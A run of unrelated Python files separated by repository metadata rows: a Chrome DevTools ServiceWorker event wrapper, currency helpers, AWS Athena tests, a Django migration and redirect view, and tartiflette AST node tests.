        return lambda: self.client.remove_listener(event_name, listener)

    def workerRegistrationUpdated(
        self, listener: Optional[Callable[[Dict[str, Any]], Any]] = None
    ) -> Any:
        """
        See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#event-workerRegistrationUpdated`

        :param listener: Optional listener function
        :return: If a listener was supplied the return value is a callable that
         will remove the supplied listener otherwise a future that resolves
         with the value of the event
        """
        event_name = "ServiceWorker.workerRegistrationUpdated"
        if listener is None:
            future = self.client.loop.create_future()

            def _listener(event: Optional[Dict] = None) -> None:
                future.set_result(event)

            self.client.once(event_name, _listener)

            return future

        self.client.on(event_name, listener)
        return lambda: self.client.remove_listener(event_name, listener)

    def workerVersionUpdated(
        self, listener: Optional[Callable[[Dict[str, Any]], Any]] = None
    ) -> Any:
        """
        See `https://chromedevtools.github.io/devtools-protocol/tot/ServiceWorker#event-workerVersionUpdated`

        :param listener: Optional listener function
        :return: If a listener was supplied the return value is a callable that
         will remove the supplied listener otherwise a future that resolves
         with the value of the event
        """
        event_name = "ServiceWorker.workerVersionUpdated"
        if listener is None:
            future = self.client.loop.create_future()

            def _listener(event: Optional[Dict] = None) -> None:
                future.set_result(event)

            self.client.once(event_name, _listener)

            return future

        self.client.on(event_name, listener)
        return lambda: self.client.remove_listener(event_name, listener)
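The three `worker*` event helpers share one pattern: with no listener they return a future that resolves on the next occurrence of the event; with a listener they subscribe it and return an unsubscribe callable. Below is a self-contained sketch of that pattern against a stub emitter — `StubEmitter` and `on_event` are hypothetical stand-ins for illustration, not part of cripy:

```python
import asyncio


class StubEmitter:
    """Tiny stand-in for the client's event-emitter interface (hypothetical)."""

    def __init__(self, loop):
        self.loop = loop
        self._handlers = {}

    def on(self, name, fn):
        self._handlers.setdefault(name, []).append(fn)

    def once(self, name, fn):
        def wrapper(event=None):
            self.remove_listener(name, wrapper)
            fn(event)
        self.on(name, wrapper)

    def remove_listener(self, name, fn):
        self._handlers.get(name, []).remove(fn)

    def emit(self, name, event=None):
        for fn in list(self._handlers.get(name, [])):
            fn(event)


def on_event(client, event_name, listener=None):
    # same shape as ServiceWorker.workerErrorReported and friends
    if listener is None:
        future = client.loop.create_future()

        def _listener(event=None):
            future.set_result(event)

        client.once(event_name, _listener)
        return future
    client.on(event_name, listener)
    return lambda: client.remove_listener(event_name, listener)


async def demo():
    client = StubEmitter(asyncio.get_running_loop())
    fut = on_event(client, "ServiceWorker.workerErrorReported")
    client.emit("ServiceWorker.workerErrorReported", {"errorMessage": "boom"})
    return await fut


print(asyncio.run(demo()))  # {'errorMessage': 'boom'}
```

The future branch is one-shot (`once` unsubscribes itself), while the listener branch stays subscribed until the returned callable is invoked.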
| 36.565217 | 114 | 0.644828 | 846 | 8,410 | 6.361702 | 0.130024 | 0.048309 | 0.065403 | 0.08324 | 0.727239 | 0.701226 | 0.701226 | 0.701226 | 0.701226 | 0.667038 | 0 | 0 | 0.250416 | 8,410 | 229 | 115 | 36.724891 | 0.853744 | 0.390963 | 0 | 0.409091 | 1 | 0 | 0.142469 | 0.098146 | 0 | 0 | 0 | 0 | 0 | 1 | 0.215909 | false | 0 | 0.022727 | 0 | 0.465909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fec80b0e1ec32be8d4cf0bad84f2acae6af1d916 | 637 | py | Python | ex109/moeda.py | wtomalves/exerciciopython | 5c239521830cb8d092c7ff8646ff1f38c605509d | [
"MIT"
] | 1 | 2020-09-04T22:36:21.000Z | 2020-09-04T22:36:21.000Z | ex109/moeda.py | wtomalves/exerciciopython | 5c239521830cb8d092c7ff8646ff1f38c605509d | [
"MIT"
] | null | null | null | ex109/moeda.py | wtomalves/exerciciopython | 5c239521830cb8d092c7ff8646ff1f38c605509d | [
"MIT"
] | null | null | null |
def metade(p=0, show=False):
    resp = p / 2
    if show:
        return moeda(resp)
    else:
        return resp


def dobro(p=0, show=False):
    resp = p * 2
    if show:
        return moeda(resp)
    else:
        return resp


def aumentar(p=0, desc=0, show=False):
    resp = p + (p * desc / 100)
    if show:
        return moeda(resp)
    else:
        return resp


def diminuir(p=0, desc=0, show=False):
    resp = p - (p * desc / 100)
    if show:
        return moeda(resp)
    else:
        return resp


def moeda(p=0, moeda='R$'):
    return f'{moeda}{p:.2f}'.replace('.', ',')
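A quick usage sketch of how these helpers compose — each arithmetic helper returns a raw number by default and delegates to `moeda()` for Brazilian-style formatting when `show=True`. The two definitions are repeated inside the example only so it runs on its own:

```python
def moeda(p=0, moeda='R$'):
    # format with two decimals, then swap the '.' for the Brazilian ','
    return f'{moeda}{p:.2f}'.replace('.', ',')


def metade(p=0, show=False):
    resp = p / 2
    if show:
        return moeda(resp)
    return resp


print(metade(90))             # 45.0
print(metade(90, show=True))  # R$45,00
```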
| 14.477273 | 45 | 0.510204 | 92 | 637 | 3.532609 | 0.23913 | 0.030769 | 0.123077 | 0.172308 | 0.8 | 0.8 | 0.8 | 0.8 | 0.8 | 0.8 | 0 | 0.038095 | 0.340659 | 637 | 43 | 46 | 14.813953 | 0.735714 | 0 | 0 | 0.615385 | 0 | 0 | 0.028571 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.192308 | false | 0 | 0 | 0.038462 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
fefe76c8111d18fb0caeacfab65ef88b9d71e9de | 12,986 | py | Python | testing/test_awswrangler/test_athena.py | koshy1123/aws-data-wrangler | e7c8a2c99e1ca3eb26e434e3c6e8f6910e898200 | [
"Apache-2.0"
] | null | null | null | testing/test_awswrangler/test_athena.py | koshy1123/aws-data-wrangler | e7c8a2c99e1ca3eb26e434e3c6e8f6910e898200 | [
"Apache-2.0"
] | null | null | null | testing/test_awswrangler/test_athena.py | koshy1123/aws-data-wrangler | e7c8a2c99e1ca3eb26e434e3c6e8f6910e898200 | [
"Apache-2.0"
] | null | null | null | import logging
from pprint import pprint
import pytest
import boto3
from awswrangler import Session
from awswrangler.exceptions import QueryCancelled, QueryFailed
logging.basicConfig(level=logging.INFO, format="[%(asctime)s][%(levelname)s][%(name)s][%(funcName)s] %(message)s")
logging.getLogger("awswrangler").setLevel(logging.DEBUG)
@pytest.fixture(scope="module")
def cloudformation_outputs():
response = boto3.client("cloudformation").describe_stacks(StackName="aws-data-wrangler-test-arena")
outputs = {}
for output in response.get("Stacks")[0].get("Outputs"):
outputs[output.get("OutputKey")] = output.get("OutputValue")
yield outputs
@pytest.fixture(scope="module")
def session():
yield Session()
@pytest.fixture(scope="module")
def database(cloudformation_outputs):
if "GlueDatabaseName" in cloudformation_outputs:
database = cloudformation_outputs["GlueDatabaseName"]
else:
raise Exception("You must deploy the test infrastructure using Cloudformation!")
yield database
@pytest.fixture(scope="module")
def bucket(session, cloudformation_outputs):
if "BucketName" in cloudformation_outputs:
bucket = cloudformation_outputs["BucketName"]
session.s3.delete_objects(path=f"s3://{bucket}/")
else:
raise Exception("You must deploy the test infrastructure using Cloudformation!")
yield bucket
session.s3.delete_objects(path=f"s3://{bucket}/")
@pytest.fixture(scope="module")
def workgroup_secondary(bucket):
wkg_name = "awswrangler_test"
client = boto3.client('athena')
wkgs = client.list_work_groups()
wkgs = [x["Name"] for x in wkgs["WorkGroups"]]
if wkg_name not in wkgs:
response = client.create_work_group(Name=wkg_name,
Configuration={
"ResultConfiguration": {
"OutputLocation": f"s3://{bucket}/athena_workgroup_secondary/",
"EncryptionConfiguration": {
"EncryptionOption": "SSE_S3",
}
},
"EnforceWorkGroupConfiguration": True,
"PublishCloudWatchMetricsEnabled": True,
"BytesScannedCutoffPerQuery": 100_000_000,
"RequesterPaysEnabled": False
},
Description="AWS Data Wrangler Test WorkGroup")
pprint(response)
yield wkg_name
def test_workgroup_secondary(session, database, workgroup_secondary):
session.athena.run_query(query="SELECT 1", database=database, workgroup=workgroup_secondary)
def test_query_cancelled(session, database):
client_athena = boto3.client("athena")
query_execution_id = session.athena.run_query(query="""
SELECT
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand()
""",
database=database)
client_athena.stop_query_execution(QueryExecutionId=query_execution_id)
with pytest.raises(QueryCancelled):
assert session.athena.wait_query(query_execution_id=query_execution_id)
def test_query_failed(session, database):
query_execution_id = session.athena.run_query(query="SELECT random(-1)", database=database)
with pytest.raises(QueryFailed):
assert session.athena.wait_query(query_execution_id=query_execution_id)
| 68.708995 | 115 | 0.531187 | 1,506 | 12,986 | 4.543161 | 0.073705 | 1.359836 | 2.038001 | 2.714996 | 0.768927 | 0.749196 | 0.744519 | 0.744519 | 0.734288 | 0.720257 | 0 | 0.002047 | 0.172339 | 12,986 | 188 | 116 | 69.074468 | 0.634537 | 0 | 0 | 0.64497 | 0 | 0.579882 | 0.772601 | 0.017711 | 0 | 0 | 0 | 0 | 0.011834 | 1 | 0.047337 | false | 0 | 0.035503 | 0 | 0.08284 | 0.011834 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
3a1bc736fd8d821723eccf9448db029ab5d5c381 | 2,787 | py | Python | sym/water/migrations/0001_initial.py | panyuan5056/sy | 9cc7cdff52b495ffedbb3cca3f583c600a64f571 | [
"Apache-2.0"
] | null | null | null | sym/water/migrations/0001_initial.py | panyuan5056/sy | 9cc7cdff52b495ffedbb3cca3f583c600a64f571 | [
"Apache-2.0"
] | null | null | null | sym/water/migrations/0001_initial.py | panyuan5056/sy | 9cc7cdff52b495ffedbb3cca3f583c600a64f571 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.1.7 on 2021-03-12 09:32
from django.db import migrations, models
class Migration(migrations.Migration):
    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Decoder',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('service', models.CharField(max_length=20, verbose_name='服务')),
                ('upload', models.FileField(upload_to='', verbose_name='上传文件')),
                ('message', models.CharField(max_length=200, verbose_name='水印数据')),
                ('create_time', models.DateTimeField(auto_now_add=True)),
                ('update_time', models.DateTimeField(auto_now=True)),
            ],
        ),
        migrations.CreateModel(
            name='Encoder',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('service', models.CharField(max_length=20, verbose_name='服务')),
                ('upload', models.FileField(upload_to='', verbose_name='上传文件')),
                ('message', models.CharField(max_length=200, verbose_name='水印数据')),
                ('create_time', models.DateTimeField(auto_now_add=True)),
                ('update_time', models.DateTimeField(auto_now=True)),
            ],
        ),
        migrations.CreateModel(
            name='Log',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('service', models.CharField(max_length=20, verbose_name='服务')),
                ('upload', models.CharField(max_length=20, verbose_name='上传文件名')),
                ('status', models.CharField(max_length=20, verbose_name='状态')),
                ('create_time', models.DateTimeField(auto_now_add=True)),
                ('update_time', models.DateTimeField(auto_now=True)),
            ],
        ),
        migrations.CreateModel(
            name='Manage',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('service', models.CharField(max_length=20, verbose_name='应用')),
                ('name', models.CharField(max_length=20, verbose_name='名称')),
                ('token', models.CharField(max_length=20, verbose_name='token')),
                ('message', models.TextField(verbose_name='备注')),
                ('status', models.CharField(max_length=20, verbose_name='状态')),
                ('create_time', models.DateTimeField(auto_now_add=True)),
                ('update_time', models.DateTimeField(auto_now=True)),
            ],
        ),
    ]
| 45.688525 | 114 | 0.573018 | 283 | 2,787 | 5.434629 | 0.233216 | 0.128739 | 0.128739 | 0.171652 | 0.843953 | 0.843953 | 0.843953 | 0.775683 | 0.775683 | 0.775683 | 0 | 0.019364 | 0.277359 | 2,787 | 60 | 115 | 46.45 | 0.74429 | 0.016146 | 0 | 0.698113 | 1 | 0 | 0.093796 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.018868 | 0 | 0.09434 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
28f476120edfe742314c1bd4dd80fe2b35341518 | 140 | py | Python | librarians/core/views.py | ProjetoDeDev/librarians | 6c23280981ac8804d84a4f840c5604447f5775b8 | [
"MIT"
] | 1 | 2020-08-26T02:18:30.000Z | 2020-08-26T02:18:30.000Z | librarians/core/views.py | ProjetoDeDev/librarians | 6c23280981ac8804d84a4f840c5604447f5775b8 | [
"MIT"
] | null | null | null | librarians/core/views.py | ProjetoDeDev/librarians | 6c23280981ac8804d84a4f840c5604447f5775b8 | [
"MIT"
] | null | null | null | from django.shortcuts import render
from django.shortcuts import redirect
def redirect_to_admin(request):
return redirect('/admin') | 23.333333 | 37 | 0.785714 | 18 | 140 | 6 | 0.611111 | 0.185185 | 0.351852 | 0.462963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 140 | 6 | 38 | 23.333333 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0.042553 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
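Django's `redirect('/admin')` returns an HTTP 302 response whose `Location` header tells the browser where to go next. A hedged stdlib-only sketch of that behavior as a bare WSGI app (the `app` and `start_response` names here are illustrative, not part of the project above):

```python
from wsgiref.util import setup_testing_defaults

def app(environ, start_response):
    # Equivalent of Django's redirect('/admin'): 302 status + Location header.
    start_response("302 Found", [("Location", "/admin")])
    return [b""]

# Drive the app once without a real server to observe the redirect.
environ = {}
setup_testing_defaults(environ)
captured = {}

def start_response(status, headers):
    captured["status"] = status
    captured["headers"] = dict(headers)

body = b"".join(app(environ, start_response))
print(captured["status"], captured["headers"]["Location"])  # 302 Found /admin
```

Django wraps the same idea in `HttpResponseRedirect`; `redirect()` additionally accepts model instances and view names, resolving them to URLs before building the response.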
28fa653519fff46d4390f711fffe54c11fd373e5 | 4,735 | py | Python | tests/unit/language/ast/test_enum_type_extension.py | matt-koevort/tartiflette | 5777866b133d846ce4f8aa03f735fa81832896cd | [
"MIT"
] | 530 | 2019-06-04T11:45:36.000Z | 2022-03-31T09:29:56.000Z | tests/unit/language/ast/test_enum_type_extension.py | matt-koevort/tartiflette | 5777866b133d846ce4f8aa03f735fa81832896cd | [
"MIT"
] | 242 | 2019-06-04T11:53:08.000Z | 2022-03-28T07:06:27.000Z | tests/unit/language/ast/test_enum_type_extension.py | matt-koevort/tartiflette | 5777866b133d846ce4f8aa03f735fa81832896cd | [
"MIT"
] | 36 | 2019-06-21T06:40:27.000Z | 2021-11-04T13:11:16.000Z | import pytest
from tartiflette.language.ast import EnumTypeExtensionNode
def test_enumtypeextensionnode__init__():
enum_type_extension_node = EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
)
assert enum_type_extension_node.name == "enumTypeExtensionName"
assert enum_type_extension_node.directives == "enumTypeExtensionDirectives"
assert enum_type_extension_node.values == "enumTypeExtensionValues"
assert enum_type_extension_node.location == "enumTypeExtensionLocation"
@pytest.mark.parametrize(
"enum_type_extension_node,other,expected",
[
(
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
Ellipsis,
False,
),
(
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
EnumTypeExtensionNode(
name="enumTypeExtensionNameBis",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
False,
),
(
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectivesBis",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
False,
),
(
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValuesBis",
location="enumTypeExtensionLocation",
),
False,
),
(
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocationBis",
),
False,
),
(
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
True,
),
],
)
def test_enumtypeextensionnode__eq__(
enum_type_extension_node, other, expected
):
assert (enum_type_extension_node == other) is expected
@pytest.mark.parametrize(
"enum_type_extension_node,expected",
[
(
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
"EnumTypeExtensionNode("
"name='enumTypeExtensionName', "
"directives='enumTypeExtensionDirectives', "
"values='enumTypeExtensionValues', "
"location='enumTypeExtensionLocation')",
)
],
)
def test_enumtypeextensionnode__repr__(enum_type_extension_node, expected):
assert enum_type_extension_node.__repr__() == expected
| 35.074074 | 79 | 0.589652 | 228 | 4,735 | 12.017544 | 0.162281 | 0.127737 | 0.218248 | 0.265693 | 0.837226 | 0.788321 | 0.737956 | 0.707299 | 0.707299 | 0.65438 | 0 | 0 | 0.332207 | 4,735 | 134 | 80 | 35.335821 | 0.86654 | 0 | 0 | 0.685039 | 0 | 0 | 0.336431 | 0.335797 | 0 | 0 | 0 | 0 | 0.047244 | 1 | 0.023622 | false | 0 | 0.015748 | 0 | 0.03937 | 0 | 0 | 0 | 1 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
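The parametrized tests above exercise a common AST-node pattern: `__eq__` returns `True` only when the other object is the same node type with every attribute equal, and `__repr__` echoes all attributes. A minimal sketch of such a node class (the `Node` name is illustrative; tartiflette's real class lives in `tartiflette.language.ast`):

```python
# Illustrative sketch of the eq/repr pattern the tests above verify.
class Node:
    def __init__(self, name, directives=None, values=None, location=None):
        self.name = name
        self.directives = directives
        self.values = values
        self.location = location

    def __eq__(self, other):
        # Equal only to another Node whose attributes all match;
        # comparison against any other type (e.g. Ellipsis) is False.
        return isinstance(other, Node) and (
            self.name == other.name
            and self.directives == other.directives
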